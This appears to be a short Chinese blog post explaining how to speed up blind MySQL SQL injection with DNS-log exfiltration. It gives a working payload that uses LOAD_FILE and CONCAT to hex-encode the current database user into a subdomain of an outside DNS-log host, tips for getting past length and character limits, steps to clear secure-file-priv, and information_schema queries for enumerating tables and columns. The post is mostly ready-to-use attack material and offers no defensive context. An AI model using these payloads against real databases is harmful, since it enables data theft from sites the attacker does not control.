mysql注入之dnslog盲注加速

#拼接域名
select concat(version(),’.0535code.com’) #返回 5.5.53.0535code.com

#注意
1.域名前缀长度限制在63个字符,解决办法是用mid()函数来获取。
2.域名前缀不支持一些特殊字符,如*,解决办法是用hex()或者其他加密函数,获取到数据后再解密。

#读取文件时会解析dns协议
load_file()

#使用T00ls dnslog,或者自己找别的。
您的查询记录是t00ls.052d281fb2a9087f771cb57f7d5f02ad.tu4.org(怎么使用,自己领悟)
#测试
ping t00ls.052d281fb2a9087f771cb57f7d5f02ad.tu4.org

mysql特殊性

#启动apache
D:\phpStudy\Apache\bin\httpd.exe

#启动mysql 5.5.53之后版本,5.5.53之前的版本不需要
D:\phpStudy\MySQL\bin>mysqld.exe –secure-file-priv=
或者配置文件my.ini加入 secure-file-priv=

#构造exp
SELECT LOAD_FILE(CONCAT(‘\\\\’,(select hex(user())),’.t00ls.052d281fb2a9087f771cb57f7d5f02ad.tu4.org\\abc’))

#汇总常用函数
version() #获取mysql版本号
user() #返回当前用户名
select count(*) from mysql.user #返回用户数量
select count(*) from information_schema.schemata #返回数据库数量
database() #返回数据库名
select table_name from information_schema.tables where table_schema=’security’ limit 0,1 #获取第一个表名
select column_name from information_schema.columns where table_schema=’security’ and TABLE_NAME=’emails’ limit 0,1 #获取第一个字段名
select id from emails limit 0,1 #获取第一个字段名

发表评论

电子邮件地址不会被公开。 必填项已用*标注

This site uses Akismet to reduce spam. Learn how your comment data is processed.